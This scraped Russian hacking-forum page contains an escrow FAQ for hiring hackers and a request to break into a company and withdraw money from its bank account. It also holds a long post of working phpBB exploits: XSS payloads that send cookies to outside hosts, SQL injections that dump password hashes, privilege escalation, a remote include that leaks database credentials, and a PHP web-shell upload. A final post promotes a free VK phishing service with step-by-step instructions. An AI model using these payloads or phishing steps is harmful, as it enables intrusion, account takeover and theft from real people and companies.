4. Отвественность за сделку несет только сам заказчик и исполнитель, Администратор выполняет роль куратора сделки, но никаким образом не имеет к ней отношения.

5. Клиент либо исполнитель оплачивают единоразовый взнос в размере 10% за услуги безопасной сделки в фонд команды форума.

Наши гарантии :

1) Пройдена идентификация во всех платежных системах. (Webmoney, Yandex, QIWI, PM)
2) Чистая репутация с 2011 года, есть на всех закрытых площадках.
3) Принимаем оплату наличными и оплата любым удобным способом в платёжные системы.
4) Предоставим любые рекомендации нашей порядочности заинтересованным клиентам.

Запомните, мы отличаемся от гарантов, мы только курируем сделку,которая открыта всем оппонентам, благодаря этому, тут не может быть обмана, т.к все видят как завершилась сделка.

Ответы на вопросы:

1. Как заказать услуги хакера, чтобы меня не кинули?
- Создаете тему (сообщение Администратору) , по заявке написанной в верху данной темы, и ждете одобрение Администратора.

После того, как Администратор одобрил тему он вам предоставляет пароль от закрытой комнаты где и будет проходить сделка, находится там должны Администратор, вы и исполнитель. Оплачиваете взнос в фонд и исполнитель может начинать работать.

2.Может хакер как-то кинуть меня или обмануть через данную систему?
-Нет, ни Вы, ни хакер не смогут нарушить условия честной сделки, для этого любая сделка открыта для общего просмотра (На усмотрение клиента!) и ее курирует Администратор.

3. Что значит сделка открыта? Все смогут наблюдать каков мой заказ?
-Сделка открыта для большинства людей (рекомендуем закрытые комнаты), но всю приватную информацию (ссылку на анкету, сайт, почту и пр) видите только, Вы и хакер.

4. Для чего сделали открытые сделки?
- Для того, чтобы большинство людей видели как работает наша команда и борется с кидаловом. Открытые сделки помогают сохранить чистоту процесса и большинству пользователей подобрать нужного кандидата сделав вывод по его закрытым сделкам.

5. Что значит открытая и закрытая сделка?
- Открытая сделка - это когда вы дали заявку на работу и исполнитель ее подтвердил, но она еще в стадии выполнения. Закрытая сделка - это когда исполнитель выполнил работу и вы ее приняли без претензий.

Закрытые комнаты для сделок это отдельный форум где происходят сделки под контролем Администрации сайта. Другие пользователи не видят и не имеют доступа к вашему личному заказу (если для вас это важно)

6. Могу ли я приглашать исполнителей не являющимися пользователями вашего форума?
- Да, мы только приветствуем такого рода решения.

7. Каким образом я могу сделать оплату в фонд форума?
- Мы принимаем любой удобный для вас способ оплаты.

8. Я должен оплатить сумму работы вам? Чем вы отличаетесь от гаранта?
- Верно, вы оплачиваете сумму работы в фонд форума, что является гарантией для исполнителя,что вы платежеспособный клиент. Для вас гарантия в том, что сможете забрать средства в любой момент, так же исполнитель не получит средства до окончания работы и вашего согласия. Сумма в полном размере передается исполнителю, ТОЛЬКО ПОСЛЕ ЗАВЕРШЕНИЯ РАБОТЫ.

Наше отличие от гаранта в том, что мы открываем сделки для просмотра, по желанию заказчика, чтобы пользователи не сомневались в безопасности и знали, что в любой момент могут прекратить сделку и вернуть свои средства.


P.S Перевод на банковскую карту,осуществляется по запросу заказчика - Основателю форума,Через ЛС Возврат денежных средств осуществляется только по заявке заказчика, и переводится только на те которые более удобны для вас реквизиты!

Срок возврата осуществляется в течении 3-5 часов,с момента подачи заявки!


  • VilliamHauT, EROocculse, SusanSaX и еще 1 это нравится


#1557 услуги хакера

Написано Advocat 09 Сентябрь 2016 - 15:14

Всем профессионалам своего дела доброго времени суток!

Нужны услуги профессионального хакера. Речь идет о проникновении в одну компанию и вывода определенных средств с ее банковского счета. Ищу не по найму, а на партнерских началах. Фундамент для работы уже есть: доступ к корпоративной почте, имена, доступ к неким бух док-ам. Пообщаюсь желающими! Спасибо за уделенное время!


  • EROocculse, SusanSaX, Loans Online и еще 1 это нравится


#13 Все о phpBB x.xx, Уязвимости.

Написано Admin 24 Ноябрь 2015 - 02:10

1.4.2 version: 
--
Cross Site Scripting:
Cross Site Scripting позволяет нападающим вставлять JavaScript код (и другой код HTML) в существующие сообщения. 
Пример:
{img}javascript:alert('This is the test'){/img}
--
 
1.4.4 version:
--
DoS и нарушение структуры базы данных:
Уязвимость существует в выполнении phpBB's BBcode ({code}{/code},{quote}{/quote},{list}{/list}).
Добавление строки ‘0000000’ внутри одного из этих тэгов, приведет к 100% потреблению ресурсов памяти и процессора на уязвимом сервере и к нарушении структуры базы данных.
Пример: 
1. {code}'0'*800{/code} 
2. {code}0{code}0{code}0{/code}0{/code}0{/code}
--
 
2.0.0 version:
--
Межсайтовый скриптинг: 
Уязвимость защиты в программе позволяет удаленным нападающим вставлять злонамеренный HTML и JavaScript код в существующие web-страницы внутри тэга IMG специальной конструкции:
 
{img}http://a.a/a"onerror="javascript:alert(document.cookie){/img}
--
Повышение привилегий:
Уязвимость позволяет пользователю с учетной записью "user" поднять свои привилегии до уровня "administrator", тем самым получая полный контроль над управлением форума. 
 
Ошибка присутствует в сценарии admin_ug_auth.php (используется для установления разрешения). Для просмотра защищенных страниц сценарий способен ограничить доступ непривилегированным пользователям, но он не производит такую проверку при отправлении назад данных. Демонстрационный код:
<html><head></head><body> <form method="post" action="http://domain_name/board_directory/admin/admin_ug_auth.php">User Level: <select name="userlevel"><option value="admin">Administrator</option><option value="user">User</option></select><input type="hidden" name="private[1]" value="0"><input type="hidden" name="moderator[1]" value="0"><input type="hidden" name="mode" value="user"><input type="hidden" name="adv" value="">User Number: <input type="text" name="u" size="5"><input type="submit" name="submit" value="Submit"> </form></body></html>
Далее отредактируйте действие формы в этом коде, измените местоположение admin сценария. Обычно, он находится в подкаталоге /admin/. Затем вызовите код в локальном окне браузера, и введите номер неадминистративного пользователя. Нажмите submit. При следующем заходе, вы получите права администратора.
--
 
2.0.2 version:
--
Административный доступ:
Обнаружена возможность изменения SQL запроса. Удаленный пользователь может получить хеш пароля администратора и, используя его, получить полный контроль над PHPbb системой. 
 
Уязвимость обнаружена в сценарии page_header.php.
Например, чтобы взломать user_id '40', запросите следующую страницу: 
 
forum_id=1+or+user_id=40+and+mid(user_password,1,1 )=char(97)/*[
 
В результате запрос будет выглядеть следующим образом: 
 
SELECT u.username, u.user_id, u.user_allow_viewonline, u.user_level, 
s.session_logged_in, s.session_ip FROM phpbb_users u, phpbb_sessions s WHERE 
u.user_id = s.session_user_id AND s.session_time >= 1035778374 AND s.session_page = 
1 or user_id=40 and mid(user_password,1,1)=char(97)/* ORDER BY u.username ASC, 
s.session_ip ASC
 
Имя администратора системы можно просмотреть вверху списка пользователей внизу страницы форума. Далее добавляя хеш пароля в куки, можно войти на сайт как администратор системы. Например, если user_id равен 32360, и хеш пароля - 6a204bd89f3c8348afd5c77c717a097a, то атакующий должен добавить следующее значение: 
a:2:{s:11:"autologinid";s:32:"
6a204bd89f3c8348afd5c77c717a097a";s:6:"userid";s:5 :"31360";} www.phpbb.com/ 1536 1063947136 29596959 197425936 29523534 *
Затем urlencode() это и поместите в куки с переменной 'phpbb2support_data', затем обратитесь к административной странице на phpbb сайте. Демонстрационный эксплоит: 
 
http://{target}/phpBB/prefs.php?HTTP_POST_VARS{save}
=1&passwd=asdfasdf&viewemail=0&savecookie=0&sig=0& smile=0&dishtml=0&disbbcode=0&themes =1?=/../../../var/logs/apache/access.log%00&save=1&user=admin&submit=Save%20Pref erences
--
2.0.3 version:
--
Выполнение произвольного PHP кода:
Уязвимость позволяет удаленному атакующему внедрить путь к 'extension.inc' в сценарии 'quick_reply.php'. В результате, атакующий может внедрить произвольный PHP сценарий из своего источника, который может использоваться для выполнения произвольных команд на Web сервере. Пример:
Создаем сценарий 'extension.inc' на удаленном сервере:
<?phpinclude('config'.'.php');echo "DB Type: $dbms <br>";echo "DB Host: $dbhost <br>";echo "DB Name: $dbname <br>";echo "DB User: $dbuser <br>";echo "DB Pass: $dbpasswd <br>";exit;?>
Затем запрос:
Раскроет содержание базы данных форума. 
--
Межсайтовый скриптинг:
Из-за недостаточной фильтрации ввода пользователя, удаленный атакующий может внедрить произвольный код сценария в сгенерированную страницу поиска. Уязвимость может использоваться для кражи опознавательных мандатов, хранящихся в куки. Пример:
<html> <body> <form method="post" name="search" action="http://target/search.php?mode=searchuser"> <input type="hidden" name="search_username" value=""/>  </form> <script> search.search_username.value='Http://savecookie/x.php?Cookie="><script>location=search.search_username.value+document.cookie;</script>'; document.search.submit(); </script> </body> </html> 
--
SQL Injection:
phpBB пользователь может посылать приватные сообщения другим пользователям. Обнаруженная уязвимость позволяет пользователю удалить текст всех приватных сообщений, сохраненных в системе.
 
Функция для удаления приватных сообщений уязвима к SQL инъекции. Если мы представляем данные, в которых мы хотим удалить приватное сообщение с номером ‘1) OR 1=1 #’, текст всех сообщений будет удален.
 
Сообщения хранятся в двух таблицах, и SQL инъекция будет воздействовать только на одну из них, так что будут удалены все тела сообщений, а темы и метаданные будут удалены, если они принадлежат текущему пользователю. Это означает, что темы удаленных сообщений все еще можно обнаружить в папках других пользователей. огда пользователь нажимает на такое удаленное сообщение, он будет переадресован назад к папке. 
 
Вы можете эксплуатировать это, отправляя(POST) следующее значение к privmsg.php?folder=inbox*sid = {SID}: 
 
mode=""
delete="true"
mark{}="1) OR 1=1 #"
confirm="Yes"
текущее значение SID можно увидеть в URL полях, если вы вошли в систему с отключенными куки.
--
 
2.0.5 version:
--
Межсайтовый скриптинг:
Удаленный пользователь может выполнить XSS нападение. 
Сообщается, что форум не фильтрует HTML код в переменной topic_id в сценарии viewtopic.php. Удаленный пользователь может сконструировать специально обработанный URL, содержащий произвольный HTML код, который будет выполнен в браузере пользователя, просматривающего эту ссылку, в контексте уязвимого сайта. Пример: 
http://{site}/phpBB/viewtopic.php?topic_id={script}
Уязвимость может использоваться для кражи опознавательных данных, хранящихся в куки целевого пользователя.
--
SQl инъекция:
Удаленный пользователь может выполнить нападение SQL инъекции. 
Сценарий 'profile.php' не проверяет переменую 'u'при отображении профиля пользователя. Удаленный пользователь может представить специально сформированный HTTP Get запрос, чтобы выполнить произвольные SQL команды на основной базе данных. 
Пример/Эксплоит: 
http://{target}/profile.php?mode=viewprofile&u='{sqlcode
--
 
2.0.5 version + MySQL 4:
--
SQL инъекция:
Уязвимость в проверке правильности ввода обнаружена в PHPbb. Удаленный пользователь может получить хеши паролей пользователей, включая администратора системы, и затем декодировать их. 
Сообщается, что сценарий viewtopic.php не проверяет данные, представленные пользователем в переменной $topic_id, перед выполнением SQL запроса. Удаленный атакующий может представить специально обработанное значение для этой переменной, чтобы выполнить дополнительный SQL запрос и получить произвольные данные их MySQL базы данных, включая MD5 хеши паролей пользователей форума, включая администратора системы.
 
Exploit: [here!] (2.0.5+MySQL4.perl.txt)
--
 
2.0.6 version:
--
Межсайтовый скриптинг:
Удаленный атакующий может вставить произвольный HTML код в тело сообщения. 
Удаленный атакующий может вставить специально отформатированный BB тэг (bbcode) {url}{/url}, чтобы заставить форум отобразить произвольный код сценария в браузере пользователя, просматривающего злонамеренное сообщение. 
Пример/Эксплоит: 
{url=www.somename.ru" onclick=alert('Hello')}text{/url}
{URL=http://www. somename.ru" onclick="alert'Hello'}text{/URL} 
{URL=www. somename.ru" onclick="alert'Hello'}text{/URL}
--
Межсайтовый скриптинг:
Удаленный авторизованный администратор может выполнить XSS нападение против других администраторов форума. 
Удаленный администратор может сконструировать специально обработанную smiley панель таким образом, чтобы выполнить произвольный код сценария в браузере другого администратора, просматривающего эту панель. 
Пример/Эксплоит: Поместите в smiley панель: 
 
<script>alert('Css work')</script>
 
--
SQL иньекция:
Удаленный пользователь может внедрить SQL команды, чтобы получить административный доступ к приложению. 
 
Как сообщается, сценарий 'search.php' не достаточно проверяет параметр 'search_id'. Удаленный пользователь может послать специально обработанное значение, чтобы выполнить произвольные SQL команды на целевом сервере, например, чтобы получить хэши паролей администратора. С хэшами паролей, удаленный пользователь может изменить свои куки, чтобы получить доступ к системе. Воздействие уязвимости зависит от версии используемой базы данных MySQL. 
 
Для определения уязвимости, выполните следующий запрос: 
 
Если ваша система уязвима, то запрос выдаст SQL ошибку: 
 
SQL Error : 1064 You have an error in your SQL syntax. Check the manual that 
corresponds to your MySQL server version for the right syntax to use near ' AND 
session_id = '9c9052fd135c0cefb31ec4b5124060f7'' 
 
SELECT search_array FROM phpbb_search_results WHERE search_id = 1 AND session_id
= '9c9052fd135c0cefb31ec4b5124060f7'
Line : 693
File : /usr/local/www/data/phpBB2/search.php
Эксплоит (боле подробное описание см. в источнике сообщения) (работает только в MySQL 4.x!): 
 
(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114 ,99,104,95,114,101,115,117,108,116,
115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58 ,34,116,111,116,97,108,95,109,97,116,
99,104,95,99,111,117,110,116,34,59,105,58,53,59,11 5,58,49,50,58,34,115,112,108,105,116,
95,115,101,97,114,99,104,34,59,97,58,49,58,123,105 ,58,48,59,115,58,51,50,58,34)
,user_password,char(34,59,125,115,58,55,58,34,115, 111,114,116,95,98,121,34,59,105,58,48,
59,115,58,56,58,34,115,111,114,116,95,100,105,114, 34,59,115,58,52,58,34,68,69,83,67,34,59,
115,58,49,50,58,34,115,104,111,119,95,114,101,115, 117,108,116,115,34,59,115,58,54,58,34,116,111,112
,105,99,115,34,59,115,58,49,50,58,34,114,101,116,1 17,114,110,95,99,104,97,114,115,34,59,
105,58,50,48,48,59,125))%20from%20phpbb_users%20wh ere%20user_id={id}/*
--
SQL инъекция:
Удаленный авторизованный модератор может внедрить произвольные SQL команды. 
 
Сообщается, что функция 'groupcp.php' не проверяет правильность данных, представленных пользователем в $sql_in переменной. Удаленный авторизованный пользователь с 'moderator' привилегиями может представить специально обработанный URL, чтобы выполнить произвольные команды на целевом сервере.
--
Sql инъекция:
Уязвимость обнаружена в phpBB в 'search.php'. Удаленный пользователь может выполнить произвольные SQL команды. 
 
Уязвимость обнаружена в 'search.php' в параметре 'show_results', кода переменная $show_results не установлена к 'posts' или 'topics'.
 
Exploit: [here!] (2.0.6.perl.txt)
--
 
2.0.6c version:
--
Межсайтовый скриптинг:
Уязвимость обнаружена в phpBB в 'viewtopic.php'. Удаленный пользователь может выполнить XSS нападение. 
Уязвимость обнаруженав параметре 'postorder' в сценарии 'viewtopic.php'. Пример: 
 
%22%3E%3C%73%63%72%69%70%74%3E%61
%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6 F%6B%69%65%
--
 
2.0.6d version:
--
Межсайтовый скриптинг:
Уязвимость обнаружена в phpBB в 'viewtopic.php' и 'viewforum.php'. Удаленный пользователь может выполнить XSS нападение. 
viewforum.php?f={FNUM}&topicdays={DNUM}{XSS}
viewforum.php?f=1&topicdays=99"><script>alert(docu ment.cookie)</script>&star t=30
viewtopic.php?t=10&postdays=99"><script>alert(docu ment.cookie)</script>&start=20
--
Межсайтовый скриптинг:
Уязвимость обнаружена в phpBB в 'profile.php'. Удаленный пользователь может выполнить XSS нападение. 
 
Пример/Эксплоит:
-------------exploit.htm--------------<form name='f' action="http://site/profile.php?mode=editprofile" method="post"><input name="avatarselect" value='" ><script>alert(document.cookie)</script>'><input type="submit" name="submitavatar" value="Select avatar"></form><script>window.onload=function(){document.all.submitavatar.click();}</script>---------------end-------------------
2.0.7a version:
--
Sql инъекция:
Удаленный авторизованный администратор может внедрить SQL команды. Удаленный пользователь может выполнить XSS нападение. 
Пример: 
admin_smilies.php?mode=edit&id=99 UNION SELECT 0,username,0,user_password FROM othersite_phpbb_users WHERE user_id=2
и еще: 
admin_smilies.php?mode=edit&id={SQL}
admin_ smilies.php?mode=delete&id={SQL}
admin_smilies.php?mode=edit&id={XSS}
admin_smilies.php?mode=delete&id={XSS}
admin_styles.php?mode=edit&style_id={SQL}
admin_styles.ph p?mode=delete&style_id={SQL}
admin_styles.php?mode=edit&style_id={XSS}
admin_styles.php?mode=delete&style_id={XSS}
Также сообщается, что множество сценариев не проверяют ID сессии. В результате удаленный пользователь может внедрить phpBB команды в тело сообщения, которые будут выполнены в браузере целевого пользователя, просматривающего сообщение форума.
--
 
2.0.8 version:
--
Sql инъекция:
Уязвимость в проверке правильности входных данных обнаружена в 'privmsg.php' сценарии. Удаленный пользователь может внедрить произвольный SQL код. 
 
Пример: 
pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,
user_password,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null ,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/* 
/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_u ser=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0 ,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*
--
Раскрытие пути:
 
 
 
 
--
XSS:
in "index.php":
 
{cat_id}=1&category_rows{0}{cat_title}=waraxe<scri pt>alert(document.cookie);</script>&category_rows{0}{cat_order}=99
 
in "languagelang_englishlang_faq.php":
 
http://localhost/phpbb208/faq.php?faq{0}{0...document.cookie );</script>bar&faq{0}{1}=waraxe
 
in "languagelang_englishlang_bbcode.php ":
 
{0}=f00<script>alert(document.cookie);</script>bar&faq{0}{1}=waraxe
--
 
2.0.8а version:
--
Спуфинг IP адресов:
Удаленный пользователь может подделать свой IP адрес, который будет зарегистрирован приложением. 
 
Удаленный пользователь может сконструировать специально обработанный 'X-Forwarded-For' HTTP заголовок, чтобы подменить свой реальный IP адрес произвольным IP адресом. 
 
В результате удаленный пользователь может обойти ограничения доступа к приложению по IP адресу.
--
 
2.0.10 version:
--
Межcайтовый скриптинг и Response Splitting Attacks:
Уязвимость позволяет удаленному пользователю выполнить XSS нападение. 
 
1. Сценарий /phpBB2/search.php' не фильтрует HTML код в поле 'search_author'. Пример: 
 
search_author=%27%3Cscript%3Ealert(document.cookie )%3C/script%3E
 
Также сообщается, что phpBB уязвим к HTTP Response Splitting нападениям (как описано в 
http://www.sanctumin.....PResponse.pdf). Удаленный пользователь может отравить еш web прокси. Уязвимы сценарии '/phpBB2/privmsg.php' и '/phpBB2/login.php'. Пример запроса: 
 
POST /phpBB2/login.php HTTP/1.0
Host: SERVER
User-Agent: Mozilla/4.7 {en} (WinNT; I)
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
Content-Type: application/x-www-form-urlencoded
Content-length: 129
 
logout=foobar&redirect=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTT
P/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a%0d%0aGotcha!
 
Еще пример: 
GET /phpBB2/privmsg.php?mode=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200
%20OK%0d%0aContent-Length:%207%0d%0a %0d%0aGotcha!
HTTP/1.0
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.7 {en} (WinNT; I)
Host: SERVER
--
SQL-инъекция и php инклудинг:
Удаленный атакующий может выполнить произвольный SQL команды и php код на уязвимой системе. 
Уязвимость существует при обработке спецсимволов в строке URL. Удаленный атакующий может выполнить SQL-инъекцию и произвольный php-сценарий на уязвимой системе. Пример:
 
viewtopic.php?t=1&highlight=%2527
 
Exploit: [here!] (2.0.10.perl.txt)
Exploit: [here!] (2.0.10-2.perl.txt)
--
Межсайтовое выполнение сценариев:
Удаленный атакующий может получить доступ к важным данным пользователей.
Уязвимость существует из-за некорректной обработки входных данных переменной 'username'. Удаленный атакующий может создать сообщение, которое при просмотре выполнить произвольный HTML код в браузере жертвы.
--
 
2.0.11 version:
--
Просмотр и удаление произвольных файлов:
Уязвимость форуме позволяет удаленному пользователю раскрыть содержание и удалять (unlink) произвольные файлы на системе с привилегиями Web сервера. 
Уязвимость в phpBB в нескольких сценариях, отвечающих за обработку аватаров (usercp_avatar.php, usercp_viewprofile.php и usercp_register.php) позволяет удаленному пользователю контролировать параметры, переданные функции unlink().
--
 
2.0.12 version:
--
Удаленный административный доступ:
Уязвимость позволяет удаленному пользователю обойти некоторые ограничения безопасности и получить административные привилегии на форуме. 
Уязвимость связана с ошибков в сравнении "sessiondata{'autologinid'}" и "auto_login_key". В результате возможно получить административные привилегии на форуме. Логическая уязвимость обнаружена в сценарии includes/sessions.php в следующей строке: 
 
if( $sessiondata{'autologinid'} == $auto_login_key )
Условие выполняется, если длина $sessiondata{'autologinid'}, представленная в куки пользователя, равна длине переменной $auto_login_key. Для исправления уязвимости ее необходимо заменить на строку: 
 
if( $sessiondata{'autologinid'} === $auto_login_key )
Также сообщается об ошибке в "viewtopic.php", которая позволят раскрыть инсталляционный путь.
 
Exploit: [here!] (2.0.12.c.txt)
--
 
2.0.13 version:
--
XSS-атака в сценарии usercp_register.php:
Уязвимость позволяет удаленному пользователю произвести межсайтовый скриптинг и получить доступ к важным данным пользователей.
Уязвимость обнаружена в сценарии 'usercp_register.php' из-за недостаточной обработки входных данных в перемененных 'allowhtml', 'allowbbcode', и 'allowsmilies' в подписи пользователя. Злоумышленник может послать частное сообщение со специально обработанной подписью, чтобы выполнить произвольный HTML сценарий в браузере целевого пользователя.
--
Раскрытие установочной директории:
Уязвимость позволяет злоумышленнику получить информацию об установочной директории приложения на сервере. 
 
Уязвимость существует в сценарии 'phpBB/db/oracle.php'. Удаленный пользователь может непосредственно вызвать уязвимый сценарий и получить информацию об установочной директории приложения на сервере.
--
Получение административных привилегий:
 
Exploit: [here!] (2.0.13-admin.c.txt)
--
Получение хеша паролей:
 
Exploit: [here!] (2.0.13.perl.txt)
--
Загрузка произвольных файлов:
Уязвимость позволяет удаленному пользователю загрузить произвольный файл на сервер.
Уязвимость существует в сценарии up.php из-за некорректной проверки расширений файлов. Удаленный авторизованный пользователь может загрузить произвольный php файл и выполнить его с привилегиями web сервера.
 
Пример Эксплоита:
<?system($cmd)?>
Сохраняем как cmd.php
Открываем http://target/phpbb/up.php
И загружаем наш код.
Его можно увидеть http://targey/phpbb/uploads/cmd.php
Запуская видим:
Warning: system(): Cannot execute a blank command in /home/target/public_html/forum/uploads/tetx.php on line 2
Следовательно мы можем выполнить NIX команды с привеленгиями веб сервера.
--
 
2.0.15 version:
--
Межсайтовый скриптинг в при обработке BBCODE URL:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость обнаружена при обработке BBCODE URL в сценарии bbcode.php. Удаленный пользователь может с помощью специально сформированного сообщения выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
 
{url=javascript://%0ASh=alert(%22CouCou%22);window.close();}Alert box with "CouCou"{/url} 
{url=javascript://%0ASh=new%20ActiveXObject(%22WScript.shell%22);
Sh.regwrite(%22HKCU%5C%5CQQQQQ
%5C%5Cqq%22,%22CouCou%22);window.close();}Create registry entry: HKCUQQQQQqq = "CouCou"{/url}
 
{url=javascript://%0Awindow.opener.document.body.innerHTML
=window.opener.document.body.innerHTML.replace(%27 Hi%20Paul%27,%27Hi%20P.A.U.L%27);
window.close();}Modify opener page: Paul -> P.A.U.L{/url}
--
Регистрация множества юзеров. Отказ в обслуживание:
 
Exploit: [here!] (2.0.15-DOS.c.txt)
--
Выполнение произвольного PHP сценария в phpBB в коде highlighting: (update time:02.07.05)
Пример:
Позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за некорректного использования функции preg_replace() в сценарии 'viewtopic.php' при обработке входных данных. Удаленный пользователь может с помощью специально сформированного запроса заставить приложение интерпретировать входные данные как PHP сценарий и выполнить его. 
 
Exploit: [here!] (2.0.15.perl.txt)
 
2.0.19 version:
--
Раскрытие данных:
Уязвимость существует из-за того, что ID сессии включается в заголовок HTTP "Referer" при отправке запросов внешние аватары или при создании ссылок на внешние сайты. Злоумышленник может заставить администратора просмотреть профиль пользователя, содержащий внешний аватар, и получить ID сессии администратора. Для удачной эксплуатации уязвимости необходимо, чтобы использование внешних аватаров было разрешено на сайте (не является значением по умолчанию). 
Примеры:
 
http://[HOST]/[DIR]/admin/admin_users.php?sid=88eafcce6dddcee3fccc08de7ec505d0
http://[HOST]/[DIR]/modcp.php?t=2&mode=split&sid=c1db64124b7ced0668dec5900fed3b35
--
XSS:
В admin/admin_smilies.php вы можите изменять / создавать смайлы. Нечего особенного но phpBB не проверят что происходит в БД.
$smile_code = ( isset($HTTP_POST_VARS['smile_code']) ) ? $HTTP_POST_VARS['smile_code'] : $HTTP_GET_VARS['smile_code'];$smile_url = ( isset($HTTP_POST_VARS['smile_url']) ) ? $HTTP_POST_VARS['smile_url']: $HTTP_GET_VARS['smile_url'];$smile_url = phpbb_ltrim(basename($smile_url), "'");$smile_emotion = ( isset($HTTP_POST_VARS['smile_emotion']) ) ? $HTTP_POST_VARS['smile_emotion'] : $HTTP_GET_VARS['smile_emotion'];$smile_code = trim($smile_code);$smile_url = trim($smile_url);$smile_emotion = trim($smile_emotion); // If no code was entered complain ...if ($smile_code == '' || $smile_url == ''){message_die(GENERAL_MESSAGE, $lang['Fields_empty']);} //// Convert < and > to proper htmlentities for parsing.//$smile_code = str_replace('<', '<', $smile_code);$smile_code = str_replace('>', '>', $smile_code); //// Save the data to the smiley table.//$sql = "INSERT INTO " . SMILIES_TABLE . " (code, smile_url, emoticon)VALUES ('" . str_replace("'", "''", $smile_code) . "', '" . str_replace("'", "''", $smile_url) . "', '" . str_replace("'", "''", $smile_emotion) . "')";$result = $db->sql_query($sql);
Примеры:
 
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:x:&smile_url=icon_mrg
reen.gif&smile_emotion=c" onmouseover="alert('SecurityReason.Com')" &sid=SIDofADMIN
 
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:h:&smile_url=icon_mrg
reen.gif"%20onmouseover='alert("SecurityReason.Com")'%20&sid=SIDofADMIN
 
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:q:&smile_url=icon_mrg
reen.gif"%20onmouseover="alert(document.location='http://[SRVER]/cookies?'+document.co
okie)"%20&sid=SIDofADMIN
--
Узявимость в в генераторе случаных чисел:
При восстановление пароля пользователь вводит е-маил и имя пользователя.phpBB генерирует id подтверждения
/includes/usercp_sendpasswd.php line 51"$user_actkey = gen_rand_string(true);" and than generate a password.  /includes/usercp_sendpasswd.php line 55"$user_password = gen_rand_string(false);"
Id подтверждения отсылаеться на е-маил с сылкой по которой должен проследовать пользователь для подтверждения. Давайте посмотрим на gen_rand_string() функцию:
/profile.php line 61function gen_rand_string($hash){$chars = array( 'a', 'A', 'b', 'B', 'c', 'C', 'd', 'D', 'e', 'E', 'f', 'F', 'g', 'G', 'h', 'H', 'i', 'I', 'j', 'J', 'k', 'K', 'l', 'L', 'm', 'M', 'n', 'N', 'o', 'O', 'p', 'P', 'q', 'Q', 'r', 'R', 's', 'S', 't', 'T', 'u', 'U', 'v', 'V', 'w', 'W', 'x', 'X', 'y', 'Y', 'z', 'Z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0'); $max_chars = count($chars) - 1;srand( (double) microtime()*1000000); $rand_str = '';for($i = 0; $i < 8; $i++){$rand_str = ( $i == 0 ) ? $chars[rand(0, $max_chars)] : $rand_str . $chars[rand(0, $max_chars)];} return ( $hash ) ? md5($rand_str) : $rand_str;
зная, что PRNG's действительно не случаен, и что данный те же самые, PRNG произведет те же самые случайные числа, мы можем безопасно предположить это из-за "srand( (double) microtime()*1000000); " то число всегда будет от 1 до 999,999. Также знание, что пароль сгенерирован прямо после получения id подтверждения, как только мы получаем id подтверждения, индексное микровремя, используемое, чтобы отобрать поколение пароля не будет слишком далеко, чем микровремя имело обыкновение отбирать id подтверждения. Самое плохое в этом сценарии атаки - то, что Вы должны будете послать 1мил запросов на сброс пароля , нападавший может однако снизить этот показатель к диапазону 100 КБ, если он с умеет синхронизировать, время посылки запросы со временим на сервере, А оно отображаетсья на каждой главной странице любого форума. 
 
[phpbb - нападение]
 
Я написал 3 программы, ту, которая создовала произвольные пароли и таблицы id подтверждений , ту, которая посылала GET запросы для активизации смены пароля и последнию, которая использовала список паролей, чтобы сделать нападение по словарю на учетную запись phpbb. Испытательный сайт, который я решил использовать, останется анонимным (я был забанен!) После производства id подтверждения и паролей, я решил пробовать сбросить мою собственную учетную запись. Я запросил изменение пароля к моей собственной учетной записи. Я немедленно запустил мою вторую программу, чтобы послать id's подтверждения, которые были усечены, чтобы иметь только 6 символов (длина используемую на сервере). 
 
После 40 минут программа пометила это, это сумело сбросить пароль, и это выводило id подтверждения, который активизировал изменение пароля. Я взял id подтверждения, открыл мою таблицу и узнал, что логин проверки правильности был в индексе 117312 (мне повезло , могло, были и больше). Я открыл таблицу паролей, удалил все перед индексом 117312 и все после индекса 120000,получилс список в 2688 пароля. Я запустил мою заключительную программу, используя список паролей. Я получил новый пароль в течение 10 секунд, это было в индексе 117490, что означает, что чтобы произвести id подтверждения надо примерно 178.

  • EROocculse, Genolbon, SusanSaX и еще 1 это нравится


#1150 Учимся взламывать ВК

Написано Kivinapa 07 Август 2016 - 04:47

Сегодня я расскажу Вам о том как проще всего получить доступ к чужим страничкам ВК.
На мой взгляд самый простой метод - это "Фишинг", от анг. рыбалка. Суть рыбалки заключается в том, что вы подсовываете жертае наживку (фэйковаю страницу) под любым методом. Например:
Смотри это не твой муж развлекается с бабами "..... Фишинговая ссылка" или размещения объявления в группах мол тут много того то и тогото.
При переходе погружается фэйк главной страница и недолекие ющеры думают, что их выкинуло из ВК и пытаются авторизироваться вследствии чего мы и получаем их логин и палоль.

Если кто-то хочет попробовать я поднял простинький сервис по этой теме.

Как пользоваться:
1. Простая регистрация (без подтверждения почты). Просто придумайте себе логин и пароль.
2. Сократите полученную ссылку любым сервисом коротких ссылок.
3. Разместите ссылку в популярных группах или отправте жертве. Для рассылки используйте фжйк который не жалко ибо последует бан.
4. Когда жертва проглотит наживку её данные (Логин,Пароль,Количество друзей и групп) отобразятся в вашей базе на сайте.
5. Пользуйтесь....

Сервис обсалютно бесплатный и не содержит рекламы.

